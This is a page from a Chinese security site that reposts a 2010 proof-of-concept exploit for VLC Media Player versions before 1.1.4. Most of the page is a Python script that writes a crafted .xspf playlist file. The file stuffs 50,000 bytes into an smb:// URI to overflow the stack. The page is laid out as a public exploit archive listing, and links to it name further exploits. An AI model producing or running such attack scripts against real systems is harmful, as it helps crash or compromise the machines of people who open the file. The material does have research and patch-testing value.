首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VLC Media Player < 1.1.4 (.xspf) smb:// URI Handling Remote Stack Overflow PoC
来源:s-Dz[at]hotmail[dot]fr 作者:samir 发布时间:2010-09-06  

#!/usr/bin/python
#
# Exploit Title: VLC Media Player < 1.1.4 (.xspf) smb:// URI Handling Remote Stack Overflow PoC
# Date:    04-09-2010
# Author:  Hadji Samir   , s-Dz[at]hotmail[dot]fr
# Software Link: http://sourceforge.net/projects/vlc/files/1.1.4/win32/vlc-1.1.4-win32.exe/download?use_mirror=garr
# Version:  VLC Media Player < 1.1.4
# Tested on: Windows XP sp2 with VLC 1.1.4
# CVE :
# Notes:  Samir tjrs mahboul-3lik ...
#   
###############################################################################################################  
 

data1 = (
"\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31"
"\x2E\x30\x22\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x55\x54"
"\x46\x2D\x38\x22\x3F\x3E\x0D\x0A\x3C\x70\x6C\x61\x79\x6C\x69\x73"
"\x74\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x22\x20\x78\x6D" 
"\x6C\x6E\x73\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E"
"\x65\x78\x65\x6D\x70\x6C\x65\x2E\x6F\x72\x67\x2F\x22\x20\x78\x6D" 
"\x6C\x6E\x73\x3A\x76\x6C\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F"
"\x77\x77\x77\x2E\x65\x78\x65\x6D\x70\x6C\x65\x2E\x6F\x72\x67\x2F" 
"\x22\x3E\x0D\x0A\x09\x3C\x74\x69\x74\x6C\x65\x3E\x50\x6C\x61\x79" 
"\x6C\x69\x73\x74\x3C\x2F\x74\x69\x74\x6C\x65\x3E\x0D\x0A\x09\x3C"
"\x74\x72\x61\x63\x6B\x4C\x69\x73\x74\x3E\x0D\x0A\x09\x09\x3C\x74"
"\x72\x61\x63\x6B\x3E\x0D\x0A\x09\x09\x09\x3C\x6C\x6F\x63\x61\x74"
"\x69\x6F\x6E\x3E\x73\x6D\x62\x3A\x2F\x2F\x65\x78\x61\x6D\x70\x6C"
"\x65\x2E\x63\x6F\x6D\x40\x77\x77\x77\x2E\x65\x78\x61\x6D\x70\x6C" 
"\x65\x2E\x63\x6F\x6D\x2F\x23\x7B")

buff = ("\x41" * 50000 )

data2 = (
"\x7D\x3C\x2F\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x3E"
"\x3C\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x20\x61\x70\x70\x6C\x69"
"\x63\x61\x74\x69\x6F\x6E\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77"
"\x77\x77\x2E\x76\x69\x64\x65\x6F\x6C\x61\x6E\x2E\x6F\x72\x67\x2F"
"\x76\x6C\x63\x2F\x70\x6C\x61\x79\x6C\x69\x73\x74\x2F\x30\x22\x3E"
"\x0D\x0A\x09\x09\x09\x09\x3C\x76\x6C\x63\x3A\x69\x64\x3E\x30\x3C" 
"\x2F\x76\x6C\x63\x3A\x69\x64\x3E\x0D\x0A\x09\x09\x09\x3C\x2F\x65"
"\x78\x74\x65\x6E\x73\x69\x6F\x6E\x3E\x0D\x0A\x09\x09\x3C\x2F\x74"
"\x72\x61\x63\x6B\x3E\x0D\x0A\x09\x3C\x2F\x74\x72\x61\x63\x6B\x4C"
"\x69\x73\x74\x3E\x0D\x0A\x3C\x2F\x70\x6C\x61\x79\x6C\x69\x73\x74"
"\x3E\x0D\x0A\x0D\x0A")

wizz = open("Mahboul-3lik.xspf","w")
wizz.write(data1 + buff + data2)
wizz.close()

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·mBlogger 1.0.04 (addcomment.ph
·A-Blog v2.0 (sources/search.ph
·Movie Maker Remote Code Execut
·Microsoft MPEG Layer-3 Remote
·FFDshow SEH Exception leading
·FCrackZip 1.0 Local Buffer Ove
·Intel Video Codecs v5 Remote D
·Linux/ARM - execve("/bin/sh",
·Trend Micro Internet Security
·Virtual DJ Trial v6.1.2 SEH Bu
·win32/xp Checksum Routine shel
·BlueCMS getip()注射漏洞
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved